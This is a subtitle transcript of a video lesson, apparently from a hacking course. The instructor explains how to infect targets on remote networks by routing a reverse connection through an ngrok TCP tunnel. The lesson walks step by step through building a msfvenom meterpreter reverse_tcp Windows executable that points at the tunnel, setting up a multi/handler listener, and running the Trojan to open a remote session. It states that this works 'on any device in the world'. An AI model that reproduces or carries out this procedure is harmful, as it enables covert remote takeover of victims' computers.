1
00:00:00,240 --> 00:00:02,310
Instructor: Hello and welcome back.

2
00:00:02,310 --> 00:00:05,550
All of this time we only infected devices

3
00:00:05,550 --> 00:00:08,490
that were on our local network.

4
00:00:08,490 --> 00:00:10,440
But what if there is a person

5
00:00:10,440 --> 00:00:12,330
or a target in a different country

6
00:00:12,330 --> 00:00:14,760
that we want to infect with our payload?

7
00:00:14,760 --> 00:00:16,620
How can we do that?

8
00:00:16,620 --> 00:00:18,990
Well, we're going to see right now.

9
00:00:18,990 --> 00:00:21,690
As I already mentioned at the end of the previous video,

10
00:00:21,690 --> 00:00:23,700
there are two different ways.

11
00:00:23,700 --> 00:00:26,670
There is a way of port forwarding on a router,

12
00:00:26,670 --> 00:00:28,650
and I'm not going to show that right now

13
00:00:28,650 --> 00:00:30,300
because that would require you

14
00:00:30,300 --> 00:00:32,580
to have access to the router,

15
00:00:32,580 --> 00:00:34,080
and every router is different,

16
00:00:34,080 --> 00:00:36,241
so the settings for the port forwarding

17
00:00:36,241 --> 00:00:40,110
could actually be completely different for you and me.

18
00:00:40,110 --> 00:00:43,440
But this method, which is a method using a tool

19
00:00:43,440 --> 00:00:46,200
called ngrok, works on any network.

20
00:00:46,200 --> 00:00:49,080
You do not have to have access to your router.

21
00:00:49,080 --> 00:00:50,760
You can just run this tool

22
00:00:50,760 --> 00:00:54,660
and you can hack a device on a completely different network

23
00:00:54,660 --> 00:00:57,120
in a completely different country.

24
00:00:57,120 --> 00:00:58,680
Let's see how we can do that.

25
00:00:58,680 --> 00:01:00,720
So the first thing that I want you to do

26
00:01:00,720 --> 00:01:02,670
is I want you to open your Google Chrome

27
00:01:02,670 --> 00:01:05,850
and type ngrok in your search bar.
28
00:01:05,850 --> 00:01:09,090
Once you do that, you should see this link, ngrok.com.

29
00:01:09,090 --> 00:01:13,350
Click on it, and it'll ask you to create an online account,

30
00:01:13,350 --> 00:01:15,330
and this is something that you must do

31
00:01:15,330 --> 00:01:17,400
in order for this to work.

32
00:01:17,400 --> 00:01:20,010
So just go and sign up, create the account,

33
00:01:20,010 --> 00:01:21,560
and once you create the account

34
00:01:22,860 --> 00:01:24,960
it'll lead you to this page right here

35
00:01:24,960 --> 00:01:27,880
where you will have the option to download the ngrok tool,

36
00:01:28,740 --> 00:01:32,100
and you will also have three different steps

37
00:01:32,100 --> 00:01:35,250
as to how you can install and run the tool.

38
00:01:35,250 --> 00:01:38,763
So the first step is to download ngrok and unzip it.

39
00:01:39,600 --> 00:01:41,280
We want to download it for Linux

40
00:01:41,280 --> 00:01:42,480
as we are running Kali Linux,

41
00:01:42,480 --> 00:01:45,240
so I'm just going to go and save the file.

42
00:01:45,240 --> 00:01:47,310
Now, all of the steps I already did;

43
00:01:47,310 --> 00:01:49,050
once you navigate to the downloads,

44
00:01:49,050 --> 00:01:51,990
you will have the ngrok-stable.zip file,

45
00:01:51,990 --> 00:01:53,460
and you will notice I have two of them

46
00:01:53,460 --> 00:01:54,810
because, as I mentioned,

47
00:01:54,810 --> 00:01:57,330
this is something that I already did.

48
00:01:57,330 --> 00:01:58,560
The next thing that you want to do

49
00:01:58,560 --> 00:02:01,050
is you want to move this file to your desktop

50
00:02:01,050 --> 00:02:03,753
and you want to run this command right here.

51
00:02:04,830 --> 00:02:07,620
Once you run it, you want to connect it to your account

52
00:02:07,620 --> 00:02:10,530
by running the command under step number two,

53
00:02:10,530 --> 00:02:12,690
and that is the entire installation.
54
00:02:12,690 --> 00:02:14,613
After that, you will be good to go.

55
00:02:15,540 --> 00:02:19,323
So let's go back to our terminal and see how ngrok works.

56
00:02:20,400 --> 00:02:22,800
You have this file which you downloaded,

57
00:02:22,800 --> 00:02:25,440
you unzipped it, and you got this file.

58
00:02:25,440 --> 00:02:27,480
This is the ngrok executable.

59
00:02:27,480 --> 00:02:32,140
In order to run this, we can type ./ngrok

60
00:02:32,140 --> 00:02:35,640
and after it we want to specify what port

61
00:02:35,640 --> 00:02:38,250
we want to port forward to their servers.

62
00:02:38,250 --> 00:02:41,130
They work similarly to port forwarding on the router.

63
00:02:41,130 --> 00:02:43,350
Just this time we're using their servers

64
00:02:43,350 --> 00:02:46,350
in order to perform the port forwarding.

65
00:02:46,350 --> 00:02:48,690
However, with the free version of ngrok

66
00:02:48,690 --> 00:02:52,530
the port might change every time you restart the tool.

67
00:02:52,530 --> 00:02:54,420
If you get the paid version of ngrok

68
00:02:54,420 --> 00:02:57,060
then I believe you can get a port forwarded

69
00:02:57,060 --> 00:02:59,370
which will be the same every time,

70
00:02:59,370 --> 00:03:01,530
but we're going to go with the free version right now.

71
00:03:01,530 --> 00:03:06,360
So we can just type ./ngrok and we want to type tcp,

72
00:03:06,360 --> 00:03:07,560
which stands for the connection.

73
00:03:07,560 --> 00:03:09,690
We want to initiate a TCP connection,

74
00:03:09,690 --> 00:03:13,200
and let's forward port 5555.

75
00:03:13,200 --> 00:03:14,760
This is the command that we want to run

76
00:03:14,760 --> 00:03:16,590
in order to run ngrok.

77
00:03:16,590 --> 00:03:18,633
Once you do that, press enter,

78
00:03:21,450 --> 00:03:23,910
and it'll start the tool.

79
00:03:23,910 --> 00:03:25,830
If it says session status online,

80
00:03:25,830 --> 00:03:28,860
that means everything is working under the account.
81
00:03:28,860 --> 00:03:31,890
You will see your username, which you created

82
00:03:31,890 --> 00:03:33,480
once creating the online account.

83
00:03:33,480 --> 00:03:35,010
We can see the version of ngrok.

84
00:03:35,010 --> 00:03:37,830
We can see the region to where the port forwarded us,

85
00:03:37,830 --> 00:03:41,460
and here is their server that they're using to

86
00:03:41,460 --> 00:03:43,860
port forward our port.

87
00:03:43,860 --> 00:03:46,020
This is the website or the link,

88
00:03:46,020 --> 00:03:50,520
and this is the port that we want our targets to connect to.

89
00:03:50,520 --> 00:03:52,230
I know this might look confusing,

90
00:03:52,230 --> 00:03:55,410
but just stick with me for a moment right now.

91
00:03:55,410 --> 00:03:57,630
So we got our ngrok tool ready.

92
00:03:57,630 --> 00:03:59,850
Now let's create our payload.

93
00:03:59,850 --> 00:04:02,485
I will zoom this in, and

94
00:04:02,485 --> 00:04:05,970
I'm going to navigate to the desktop.

95
00:04:05,970 --> 00:04:07,620
Great.

96
00:04:07,620 --> 00:04:10,110
There are two things that differentiate

97
00:04:10,110 --> 00:04:12,690
once creating a payload for the local area network

98
00:04:12,690 --> 00:04:14,220
and once creating a payload

99
00:04:14,220 --> 00:04:17,579
for a different network with the ngrok tool.

100
00:04:17,579 --> 00:04:19,709
And those two things are local host

101
00:04:19,709 --> 00:04:22,503
and local port that the target connects to.

102
00:04:23,880 --> 00:04:27,300
But before we even do that, what I want you to do is

103
00:04:27,300 --> 00:04:29,760
I want you to copy this link right here

104
00:04:29,760 --> 00:04:32,310
from the slashes up to the two dots.
105
00:04:32,310 --> 00:04:36,960
So 2.tcp.ngrok.io, for you this might be a different link,

106
00:04:36,960 --> 00:04:39,243
but I want you to copy only this part.

107
00:04:42,090 --> 00:04:43,470
Copy selection,

108
00:04:43,470 --> 00:04:46,380
and I want you to run the command host

109
00:04:46,380 --> 00:04:49,023
and then paste this link.

110
00:04:50,490 --> 00:04:53,940
This host tool will give us the IP address of this link.

111
00:04:53,940 --> 00:04:58,940
So it tells us this link has address 3.138.45.170,

112
00:05:01,050 --> 00:05:02,790
and this is the IP address

113
00:05:02,790 --> 00:05:06,483
that you will use as a local host for your payload creation.

114
00:05:07,320 --> 00:05:11,070
So let's go and type msfvenom -p.

115
00:05:11,070 --> 00:05:12,720
And for this video,

116
00:05:12,720 --> 00:05:14,760
we don't really need to attack an Android device.

117
00:05:14,760 --> 00:05:16,200
We are going to attack Windows.

118
00:05:16,200 --> 00:05:17,280
It doesn't really matter.

119
00:05:17,280 --> 00:05:19,470
It'll work on both of those devices.

120
00:05:19,470 --> 00:05:20,550
So I'm just going to go with

121
00:05:20,550 --> 00:05:25,055
windows/x64/meterpreter/reverse_tcp,

122
00:05:25,055 --> 00:05:29,400
and I'm using x64 because I'm attacking a 64-bit Windows.

123
00:05:29,400 --> 00:05:31,080
You can adapt your payload

124
00:05:31,080 --> 00:05:32,670
to the machine that you're attacking,

125
00:05:32,670 --> 00:05:37,670
and after it we set the LHOST to be this IP address.

126
00:05:37,890 --> 00:05:39,300
Paste the selection,

127
00:05:39,300 --> 00:05:41,700
and the LPORT, remember I also said that

128
00:05:41,700 --> 00:05:45,180
the LPORT is different in this command.

129
00:05:45,180 --> 00:05:50,003
The LPORT is going to be this port right here, so 16722.

130
00:05:51,150 --> 00:05:54,990
For you, once again, this port will probably be different.
131
00:05:54,990 --> 00:05:59,970
I'm going to copy it and I'm going to paste it right here,

132
00:05:59,970 --> 00:06:03,250
and the output can be shell.exe.

133
00:06:04,140 --> 00:06:05,970
I'll press enter,

134
00:06:05,970 --> 00:06:09,930
and in just a few seconds we have our payload ready.

135
00:06:09,930 --> 00:06:14,930
Now I'm just going to go and lower both of these terminals

136
00:06:15,660 --> 00:06:17,970
and I'm going to paste it,

137
00:06:17,970 --> 00:06:21,843
or paste the payload, onto my Windows 10 desktop.

138
00:06:22,740 --> 00:06:24,810
Here it is, but before I run it,

139
00:06:24,810 --> 00:06:29,400
of course I have to set up my msfconsole listener,

140
00:06:29,400 --> 00:06:33,420
so I'm just going to go and enter msfconsole.

141
00:06:33,420 --> 00:06:34,800
But you will notice that,

142
00:06:34,800 --> 00:06:39,000
as the local host and local port inside the msfconsole,

143
00:06:39,000 --> 00:06:41,850
we're not going to be using these two things,

144
00:06:41,850 --> 00:06:45,060
this IP address from this link and this port right here.

145
00:06:45,060 --> 00:06:48,120
We only use them for our payload creation;

146
00:06:48,120 --> 00:06:51,210
in the msfconsole we want to specify this.

147
00:06:51,210 --> 00:06:53,520
We want to specify the local host to be the host

148
00:06:53,520 --> 00:06:55,658
that we are listening on for the incoming connections

149
00:06:55,658 --> 00:07:00,658
and port 5555 to be the local port that is also listening

150
00:07:00,690 --> 00:07:02,970
for the incoming connections.

151
00:07:02,970 --> 00:07:04,020
So let's go right here.
152
00:07:04,020 --> 00:07:07,150
First of all, we're going to use exploit/multi/handler.

153
00:07:10,050 --> 00:07:12,750
Set the payload to the payload that you generated;

154
00:07:12,750 --> 00:07:15,450
in case you're testing this on an Android device,

155
00:07:15,450 --> 00:07:18,090
make sure you select the correct payload,

156
00:07:18,090 --> 00:07:23,090
and the LHOST is going to be the IP address 0.0.0.0,

157
00:07:23,760 --> 00:07:28,020
which means we are listening on any interface whatsoever.

158
00:07:28,020 --> 00:07:32,460
You should also select and type right here 0.0.0.0,

159
00:07:32,460 --> 00:07:34,235
and under the LPORT you want to

160
00:07:34,235 --> 00:07:36,600
type the port that you forwarded.

161
00:07:36,600 --> 00:07:38,820
In my case, it is 5555,

162
00:07:38,820 --> 00:07:41,523
so I'm going to type set LPORT 5555.

163
00:07:44,070 --> 00:07:47,700
Once you do this, you want to type run.

164
00:07:47,700 --> 00:07:50,520
It'll start listening for the connections

165
00:07:50,520 --> 00:07:54,600
on 0.0.0.0 on the port that you forwarded.

166
00:07:54,600 --> 00:07:57,363
And if I go right here and run this,

167
00:07:59,640 --> 00:08:03,180
for some reason it says this app cannot run on Windows.

168
00:08:03,180 --> 00:08:07,470
Let's see what the problem is.

169
00:08:07,470 --> 00:08:11,670
Hmm, it could be that x64 is presenting a problem

170
00:08:11,670 --> 00:08:14,670
for some reason, so we're just going to create

171
00:08:14,670 --> 00:08:17,040
another payload real quick.

172
00:08:17,040 --> 00:08:20,850
It might have misconfigured something once I pasted it

173
00:08:20,850 --> 00:08:23,130
from the Kali Linux to the desktop,

174
00:08:23,130 --> 00:08:27,090
but nonetheless let's remove the current shell.exe

175
00:08:27,090 --> 00:08:31,937
and let's run the previous command real fast.
176
00:08:31,937 --> 00:08:35,400
First thing is I need an IP address

177
00:08:35,400 --> 00:08:36,720
from this link right here,

178
00:08:36,720 --> 00:08:40,080
so I'm just going to copy it once again

179
00:08:40,080 --> 00:08:44,820
and I'm going to type host and then paste this.

180
00:08:44,820 --> 00:08:47,340
Okay, once we get the IP address,

181
00:08:47,340 --> 00:08:50,580
then we want to create the payload, so msfvenom -p,

182
00:08:50,580 --> 00:08:53,760
and let's just use the regular meterpreter payload,

183
00:08:53,760 --> 00:08:56,460
which I don't believe was an issue, but just in case.

184
00:08:56,460 --> 00:08:58,350
Let's go with the regular payload.

185
00:08:58,350 --> 00:09:02,253
LHOST is going to be equal to this IP address.

186
00:09:06,720 --> 00:09:11,720
LPORT is going to be equal to 16722,

187
00:09:12,600 --> 00:09:15,960
which, remember, is this port number right here,

188
00:09:15,960 --> 00:09:19,050
and let's also add -f to be exe,

189
00:09:19,050 --> 00:09:21,630
just so we can specify that this is an exe file;

190
00:09:21,630 --> 00:09:23,985
for some reason maybe this presented a problem

191
00:09:23,985 --> 00:09:26,310
once we copied it to the desktop.

192
00:09:26,310 --> 00:09:30,210
And the output is going to be test.exe,

193
00:09:30,210 --> 00:09:32,460
and let's just wait for this to finish.

194
00:09:32,460 --> 00:09:34,560
Okay, now it gives a different size.

195
00:09:34,560 --> 00:09:36,660
It could be that it was a problem

196
00:09:36,660 --> 00:09:39,480
because it didn't specify -f exe.

197
00:09:39,480 --> 00:09:44,480
Nonetheless, let's go and copy the payload onto the desktop.

198
00:09:47,400 --> 00:09:52,400
Let's go and open the msfconsole and let's run the Trojan.

199
00:09:54,300 --> 00:09:57,360
Go back to Kali Linux, and here it is.
200
00:09:57,360 --> 00:10:00,000
We got meterpreter session one opened

201
00:10:00,000 --> 00:10:02,530
from the local host on the target machine,

202
00:10:03,480 --> 00:10:05,280
but it does tell us right here

203
00:10:05,280 --> 00:10:07,890
that meterpreter session one died, and that is because

204
00:10:07,890 --> 00:10:10,230
we actually misconfigured the payload right here,

205
00:10:10,230 --> 00:10:13,530
since we set it up for the previous payload that didn't work;

206
00:10:13,530 --> 00:10:16,440
therefore, it has this x64.

207
00:10:16,440 --> 00:10:18,090
Just so we can make sure everything works,

208
00:10:18,090 --> 00:10:19,860
I'm going to set the payload to be

209
00:10:19,860 --> 00:10:24,860
windows/meterpreter/reverse_tcp.

210
00:10:26,460 --> 00:10:28,260
Show options.

211
00:10:28,260 --> 00:10:30,000
Everything else is already set.

212
00:10:30,000 --> 00:10:31,950
Let's run the listener once again

213
00:10:31,950 --> 00:10:34,860
and let's run the payload once again,

214
00:10:34,860 --> 00:10:37,110
and right now everything works.

215
00:10:37,110 --> 00:10:39,990
We got meterpreter session two open

216
00:10:39,990 --> 00:10:42,460
and we can run all of the commands

217
00:10:43,440 --> 00:10:45,630
that meterpreter gives us.

218
00:10:45,630 --> 00:10:46,500
Awesome.

219
00:10:46,500 --> 00:10:50,130
Now, this attack will work on any device in the world

220
00:10:50,130 --> 00:10:52,110
because they're not really connecting

221
00:10:52,110 --> 00:10:53,940
straight to our machine.

222
00:10:53,940 --> 00:10:58,440
They're connecting to this link right here and to this port,

223
00:10:58,440 --> 00:11:00,420
and what ngrok is doing for us

224
00:11:00,420 --> 00:11:04,200
is it is forwarding their connection back to our machine

225
00:11:04,200 --> 00:11:06,750
on the local host and on this port.
226
00:11:06,750 --> 00:11:08,640
That's why in the msfconsole

227
00:11:08,640 --> 00:11:11,970
we are listening on this port and on the local host,

228
00:11:11,970 --> 00:11:13,470
while in the payload creation

229
00:11:13,470 --> 00:11:17,070
we specify that the target should connect right here.

230
00:11:17,070 --> 00:11:18,750
Then they forward the connection

231
00:11:18,750 --> 00:11:23,490
and we get our meterpreter session opened.

232
00:11:23,490 --> 00:11:27,693
And from there we can execute all of the commands as usual.

233
00:11:29,250 --> 00:11:30,083
Awesome.

234
00:11:30,083 --> 00:11:32,160
Now, let me know if you also want me to show you

235
00:11:32,160 --> 00:11:34,740
the port forwarding, how it looks on my router,

236
00:11:34,740 --> 00:11:36,360
in case you want to see that.

237
00:11:36,360 --> 00:11:38,610
But nonetheless, this is the best way

238
00:11:38,610 --> 00:11:40,680
that you can actually perform port forwarding

239
00:11:40,680 --> 00:11:43,650
without needing access to the router.

240
00:11:43,650 --> 00:11:44,483
Thank you for watching

241
00:11:44,483 --> 00:11:46,443
and I will see you in the next video.